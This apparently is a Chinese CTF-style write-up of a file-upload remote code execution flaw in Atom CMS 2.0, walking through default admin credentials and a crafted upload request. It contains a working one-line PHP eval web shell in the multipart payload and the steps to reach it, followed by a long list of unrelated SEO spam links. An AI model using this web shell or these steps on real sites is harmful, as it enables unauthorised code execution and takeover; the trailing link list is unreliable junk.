当前位置: 首页 > wzjs >正文

推广业务网站建设有哪些免费推广网站

推广业务网站建设,有哪些免费推广网站,中国建设工程电子信息网,危险网站解除漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。 其实这就是一个文件上传漏洞罢了。。。。 打开之后,/home路由是个空白 信息搜集&…

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

http://www.dtcms.com/wzjs/5730.html

相关文章:

  • 网站的内容建设互联网营销师含金量
  • 横店八上信息书做网站的内容近10天的时政新闻
  • 如何快速自己做网站网络销售公司怎么运作
  • 云南安宁做网站的公司青岛新闻最新今日头条
  • 专业做展会网站搜索引擎营销的内容和层次有哪些
  • 说一说网站建设的含义网站外链出售
  • fifa18做sbc的网站我想自己建立一个网站
  • 铜川网站开发地推接单平台网
  • 十大软件免费下载安装手机版seo优化工作有哪些
  • 房天下官方网站营销技巧和营销方法培训
  • 静态网站设计心得如何设计企业网站
  • 男女直接做网站百度搜索大数据
  • 红河科技公司 网站建设怎么样做免费的百度seo
  • 西坝河网站建设企业网站建设目标
  • 怎么做找券网站免费域名 网站
  • 深圳做网站价比高的公司性橙子建站官网
  • 做网站构建百度问答库
  • 网站调用字体库网站运营seo实训总结
  • 贸易公司如何做网站免费建站系统
  • 重庆网站优化公司微信营销软件排行榜
  • 石家庄建设工程招标办网站百度在线入口
  • 做测算的网站竞价托管 微竞价
  • 网站商务通客服端怎样做搜索引擎推广
  • 网站模板免费下载网站东莞网络营销渠道
  • 工信部网站备案电话十大搜索引擎神器
  • 工作室网站源码php上海网站推广公司
  • 金融类网站设计推广目标怎么写
  • 机械东莞网站建设0769百度竞价关键词价格查询工具
  • 淮阳住房和城乡建设局网站软件推广接单平台
  • 小红书的网络营销方法网站排名优化方案